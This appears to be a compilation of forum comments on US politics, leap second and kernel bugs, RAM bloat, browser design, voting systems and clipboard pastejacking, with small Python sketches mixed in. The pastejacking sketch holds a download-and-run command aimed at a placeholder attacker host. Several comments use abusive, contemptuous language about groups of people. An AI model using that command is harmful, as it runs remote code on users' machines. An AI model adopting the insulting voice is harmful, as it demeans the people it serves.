2) Refused to even allow debate about gun-law reform as children are murdered in movie theatres and preschools. (2012)
That's because some of us are intelligent enough to have observed that criminals do not obey laws. We have also observed that governments which disarm their people become tyrannical. Want my guns? Come get 'em.
Zowie. Apparently Australia has turned tyrannical when I wasn't watching.
3) Held hostage the national debt forcing the most austere sequester in federal government history, leading to spending cuts and furloughs (2013)
Good. Any spending cut is a good spending cut. As it turns out, we fiscally conservative people you hate use our money more wisely than the government does.
Aha. How do you get to work? How will you get to work when roads can't be funded out of general revenue any more (using Australian terminology)? Note here that I'm assuming that, since you are a good Republican voter, you drive a massive fuck-off SUV built in Detroit by subsidised car companies, and shun that horrible socialist public transport system. Note also that road registration systems never come close to funding the roads, despite uninformed opinions to the contrary; that expense is simply far too large for any feasible user-pays system, and the users would revolt.
If you were to get a proper representation of the Tea Party demographic (the three Cs: climate-change deniers, creationists, capitalists), you would find more GEDs and high-school drop-outs than college elite. You would also find that multiple studies have shown that the college elite (read: EDUCATED) tend to be liberal.
You might not be patting yourself on the back if you'd stood in line to vote in my precinct. Obama's biggest constituencies seem to be welfare trash, non-English-speaking immigrants, drug addicts, and various other dregs of the big city.
Oh wow, special. And it's ironic perhaps to think this article is discussing science education. Where's your data?
How is that cheating? I thought that is a simple demand and supply rule.
No. The cheating part is accepting the offer and then refusing to do the work, without advance notice. I'm perfectly fine with interviewing with the employer and then declining the offer by telling the prospective employer that it's not enough, and that you'd love to work for them if they'd increase the amount.
It's called blackmail. "I'm going to suddenly stop doing this thing that I promised to do"
Qantas went on strike in Australia a couple of years ago. As in, the company temporarily ceased to trade and banned their workers from entering the premises, because they weren't happy with how the employment negotiations were proceeding. Of course, all the conservative hacks and politicians applauded Qantas manglement for doing such a thing with absolutely no notice (to the point where passengers were stranded locally and overseas).
The same people try to make it illegal in the other direction of course.
As an ex-telescope operator (who left incidentally because I was pissed off with manglement) with friends at ALMA, I say ALMA and their member signatories may be getting what they deserve.
How often does the leap second bug recur?
That one? Once. I've seen plenty of leap second bugs of other styles, though (too many; leap seconds should be a relatively easy calculation, but we only get to test them once every three years or so, and in real time, because it's rather hard to convince a global timekeeping system that a fake leap second is about to happen just for testing. Still, I'd rather we fixed the software than do something stupid like get rid of UTC, as some idiots are proposing). But one that causes a futex loop in Java processes (and the Opera web browser)? Just the once, and mostly only on RHEL6 and Debian ~wheezy kernels at the time.
If It is known to occur, then why would such platforms be relied upon instead of patching it ahead of time?
The point of bugs is that they're not known to occur beforehand. This particular one was quite neat in that it wasn't the leap second code itself that was at fault, but the mechanism ntp used to inform the kernel that a leap second was coming up. At least it didn't happen over the New Year public holiday period this time. I knew Monday was going to be a busy day in the datacentre when I saw my three laptops at home exhibit the problem on Sunday morning, though.
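Since the thread keeps asserting that leap seconds "should be a relatively easy calculation", here's roughly what that calculation looks like. This is a sketch with a deliberately abbreviated two-entry table; the real list is published by the IERS and is much longer.

```python
from datetime import date, timedelta

# Abbreviated excerpt of the real leap second table:
# (date the new offset takes effect, TAI-UTC in seconds from then on)
LEAP_TABLE = [
    (date(2009, 1, 1), 34),
    (date(2012, 7, 1), 35),   # the June 2012 leap second discussed above
]

def tai_minus_utc(d):
    """TAI-UTC offset (in seconds) in effect on UTC date d."""
    offset = 33                      # value before the first table entry
    for effective, value in LEAP_TABLE:
        if d >= effective:
            offset = value
    return offset

def day_has_leap_second(d):
    """True if UTC day d ends with a 23:59:60 second (i.e. a new
    offset takes effect at the following midnight)."""
    return any(eff == d + timedelta(days=1) for eff, _ in LEAP_TABLE)
```

The calculation really is just a table lookup; the hard part, as the parent says, is that the code paths only ever run for real, all at once, worldwide.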
It seems to me that developing new DCIM solutions is a bit of a stretch to solve the leap second issue. Or is that just an excuse to fund new DCIM solutions (in other words, a solution in search of a problem)?
Anything can cause kernel or userland software to suddenly enter a hard loop, burning through CPU cycles and thus power. And in a large homogeneous environment, that bug can be triggered in many locations at the exact same moment in time. Another good example is the RHEL6 bug that affected us around the same time last year: the old "uptime has reached a hundred and something days, let's overflow a counter and kernel PANIC now!" bug. We found out about that bug after patching all of our systems, discovered that it applied only to the version of the patch we had managed to apply, and had to start planning to bring the next patching cycle forward (but at least we knew about it). You'd think these were the kinds of bugs we learnt about in 1995 and would never be stupid enough to put back into the kernel, but it seems every generation must learn about them for themselves instead of reading their operating systems textbooks.
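For the curious, that "hundred and something days" figure is easy to sanity-check. Assuming the widely reported variant of the bug (a 64-bit cycles-times-mult product in the scheduler clock, with a 10-bit shift; my assumption, not something stated in the parent post), the arithmetic works out to about 208.5 days:

```python
# Back-of-envelope sketch, not Red Hat's actual numbers: the 64-bit
# product cycles * mult overflows once it reaches 2**64. With a typical
# 10-bit shift, that leaves 2**54 nanoseconds of usable headroom.
NS_PER_DAY = 86_400 * 10**9

headroom_ns = 2**64 >> 10          # 2**54 ns before the multiply overflows
days = headroom_ns / NS_PER_DAY
print(round(days, 1))              # about 208.5 days of uptime
```

Which is exactly why "reboot more often than you think you need to" kept being rediscovered as an operational workaround.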
The point of these bugs is that anything might cause a large fraction of your machines to start chewing through electricity. In an overprovisioned environment (VMs, power, thin storage, whatever), you want to know about them before you trip your fuses, run out of memory, or fill up all your disks.
When RAM is plentiful and cheap and even your average smartphone has more than 1GB of RAM are you sacrificing anything by only using a few MB of RAM instead of GBs?
Your *average* smartphone? I don't choose to throw out a perfectly workable smartphone Every Damn Year, so my year old phone only has 384MB of RAM. It still works, but some modern apps that add glitz at the expense of functionality are becoming seriously painful on it.
You, sir, are what is wrong with the planet today. Too many teenage developer weenies are so abstracted away from the machine that they've forgotten how to program efficiently. "Oh, but I need all that RAM to make my program cache things so it can be quicker". So why is it so much slower to fire up a PDF viewer on my phone with 384MB of RAM than it was on my 12-year-old laptop with 128MB of RAM?
All of my machines are maxed out. All of our rackfuls of ESXi servers at work are maxed out. Adding more RAM is not *easy*. Making devs do their jobs would be easier.
From your link it seems the actual danger is in copy/pasting and then hitting enter BEFORE looking at what you pasted. If you select something to copy, then paste, and notice the pasted output is significantly different from what you selected, alarm bells should ring very quickly (unless the difference is really subtle, of course).
Hint: copied text can contain embedded newlines. And the first line of text will be some obfuscated form of stty -echo, if you have read the posted source, so you won't even know.
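To make the parent's hint concrete, here's a toy illustration (the URL and commands are made up) of why "look before you press enter" doesn't save you:

```python
# What the page *displays* for you to select:
shown = "ls -l"

# What a malicious page can put on the clipboard instead: a hidden
# command, then a newline (so the terminal runs it the instant you
# paste), then the innocent-looking text you expected to see.
payload = "stty -echo; curl http://evil.example/x | sh\nls -l"

# The embedded newline means the shell already executed a full line
# before you got any chance to review it:
has_hidden_line = "\n" in payload
looks_innocent = payload.splitlines()[-1] == shown
print(has_hidden_line, looks_innocent)
```

After pasting, your prompt shows only the innocent last line, and with `stty -echo` in play you may not even see that much.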
Then again, this seems mostly hypothetical. Does anyone actually have an example of something like this being used in a nefarious way on a Linux site?
Well, it's impossible to prove something doesn't exist, and since this whole slashdot story originated because someone's computer did something unexpected, perhaps the OP is an example of where this was used?
WhyTF would anyone want an inbuilt PDF viewer?
A browser is supposed to display whatever I click on - any file, any format. If it can play sound, play video, display photographs, display text... then why not a PDF? Seems strange to have one document format that it *cannot* display, and requires an external application to render.
Or did you want the browser to call an external program for things like
.gif, .mov, .aiff - anything that is not plain old .html ??
Yes please, because those dedicated programs I have installed do a far better job with less memory and resource usage than a bloatware browser that tries to compromise on everything. You know, "do one job and do it well" kind of Unix philosophy.
(I do let my browser run animated GIFs and SVG because it handles those well enough. But I download everything else.)
You just sound like a computer "hipster" to me. Come crack open a PBR with me and relax
.. you don't have to try this hard to be different. As someone who has done production work in many industries, please let me reassure you that we wouldn't have adopted today's tools if they weren't better than yesterday's.
5, insightful? Everything is better today? Like web2.0ified everything? Hardware management like Cisco's UCS client is now web2.0. As is VMWare's preferred interface to vsphere5. And half the monitoring crap I use. This is all in a fairly modern server farm.
And yet, the web2.0 part of all of it works exactly like, and is just as useful as a piece of dinosaur turd rotting in a vat of lava.
So, almost by definition, you're trying to run Cisco's interface over a narrow-bandwidth, relatively high-latency IPVPN link to a remote datacentre, through a VNC session. And yet when it wants to pop up a web2.0 modal confirmation (yes/no) dialog box, it makes the background *fuzzy*. That works *extremely* well. Nothing like having to wait 30 seconds every time I want to click "confirm" while it progressively makes the background more and more blurry. But that's hip, I guess.
And when I try to move a bunch of servers into a different category in the Zenoss monitoring software, there's a small chance, one that nevertheless happens often enough to keep me on my toes, that the GUI display of what I have shift-selected will be out of sync with what the backend thinks were the 4th to 8th items in the list (because some AJAX crap didn't quite load entirely, but the browser didn't flag any error), and I'll be moving a bunch of unidentified machines into the "decommissioned" category. That's awesome when it happens. Because it's web2.0, there's no change management, undo, or auditing. If I notice that a bunch of machines seem to be in the wrong category and can't work out where they came from, I have no choice but to go back to backups and try to restore several databases. That's just awesome. Give me back nagios and *automatically* managed
I mean, the trend is to remove choice and features and pretend that configuration makes things too hard for the poor lusers (à la Gnome 3).
One bug with chromium that has been marked as WontFix for this very reason, is issue 11612. "You can install an extension (that doesn't work in most situations you need it to, such as in the default about:blank)!". As bad as firefox has been getting since version 2, at least *that* particular feature still can be turned on.
But I do have to ask, WhyTF would anyone want an inbuilt PDF viewer? That's the first thing I disable in browsers that enable one by default (except in very old editions of SuSE, where it was installed into the system and couldn't be disabled, because SuSE, at least then, liked to load everything unconditionally with no way for the user to override it). You can have a poor substitute that isn't a first-class PDF viewer, can't print, is slow, and where half the key bindings just plain don't work, or you can use a dedicated PDF viewer that does One Thing Well, just like Unix intended.
All redesign work should go through the UI/UX folks responding to the users' needs.
I strongly believe that form follows function, but without real consideration to how users will be using the software the user interface can seriously impede the actual function. Some engineers can be downright sadistic in their UI designs.
UX folk are why we end up with Microsoft Windows 8, the Ribbon interface, lack of menu bars, Gnome 3 and Chromium ("no, you can't have middle-click-selection-opens-URL-contained-in-copy-buffer, because that's too confusing for the lusers!"). They should all be dumped into a vat of boiling Hydrofluoric acid.
OK, so he doesn't like good sound quality, so he got rid of the decent speakers and replaced them with Apple rubbish (which sounds good to bad ears because they've just turned up the loudness and done wacky artificial things to the phasing of the stereo signal). And the same with cameras (personally, I think people who publish photos taken with an iPhone should be shot for polluting the flow of electrons with their crappy photos). Where did his microwave go? Does he eat out entirely now? A concrete floor? Sounds lovely.
Heck, I still go on multi-day motorbike tours (with not much spare room besides my tent and sleeping bag) carrying an SLR and a second lens *because it produces better photos*. It's a pity a lot of people don't care about quality any more, but some of us still do.
(To those who will bleat "Vote!": I do vote but the only choices likely to be elected are those thoroughly venal politicians who will continue the irresponsible spending. It is built into the election process that those who are committed to significantly and actually cutting the government spending will never get the big donations necessary to win. The big donors give the big bucks to politicians who will turn the federal faucet in their direction -- not turn it off. )
Use those guns that you guys are so proud of to usher in the revolution, and thereby pass a referendum to change your broken voting system to anything but first-past-the-post. Preferably (so to speak) something preferential. Then you too can have a half-decent system where you can vote for one of the other corrupt parties without "wasting" your vote.
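For anyone unfamiliar with preferential voting: instant-runoff counting is simple enough to sketch in a few lines. This is a toy count with made-up candidates; real electoral rules add tie-breaking and formality checks.

```python
from collections import Counter

def instant_runoff(ballots):
    """Minimal instant-runoff count. Each ballot lists candidates in
    preference order. Repeatedly eliminate the last-placed candidate
    and transfer those ballots to their next surviving preference."""
    remaining = {c for b in ballots for c in b}
    while True:
        # Each still-live ballot counts for its highest surviving preference.
        tally = Counter(next(c for c in b if c in remaining)
                        for b in ballots if any(c in remaining for c in b))
        leader, votes = tally.most_common(1)[0]
        if votes * 2 > sum(tally.values()):   # absolute majority reached
            return leader
        remaining.discard(min(tally, key=tally.get))

# FPTP would elect Right (5 first preferences out of 12); under IRV the
# eliminated Centre ballots flow to Left, which wins 7 to 5.
ballots = ([["Left", "Centre"]] * 4 +
           [["Centre", "Left"]] * 3 +
           [["Right"]] * 5)
print(instant_runoff(ballots))   # prints "Left"
```

Which is exactly the "no wasted vote" property: you can rank a minor party first and your ballot still counts against the candidate you like least.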
Here's how a typical SMS platform might work: someone purchasing a box of malaria medicine could send the barcode information to a text number, which would send back an SMS message identifying the drug as real or counterfeit.
Ah, it looks like they're hoping to implement RFC3514, the evil bit. If the barcode includes the evil bit, then it must be counterfeit.
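Joking aside, what the summary describes is just a server-side lookup, no evil bit required. A toy sketch (codes and product names invented; real deployments such as mPedigree reportedly use one-time scratch-off codes rather than the printed barcode, since barcodes are trivially copied):

```python
# Hypothetical issued-code database: one-time code -> product.
ISSUED = {"4F7K2": "Coartem 20mg", "9XQ1B": "Coartem 20mg"}
USED = set()

def verify(code):
    """Reply text for an SMS verification query against the database."""
    if code not in ISSUED:
        return "COUNTERFEIT: code not recognised"
    if code in USED:
        return "WARNING: code already checked - possible copy"
    USED.add(code)                 # mark the one-time code as consumed
    return f"GENUINE: {ISSUED[code]}"
```

The one-time marking is the important bit: a counterfeiter who photocopies a genuine code only gets one buyer past the check, and every subsequent query flags the copy.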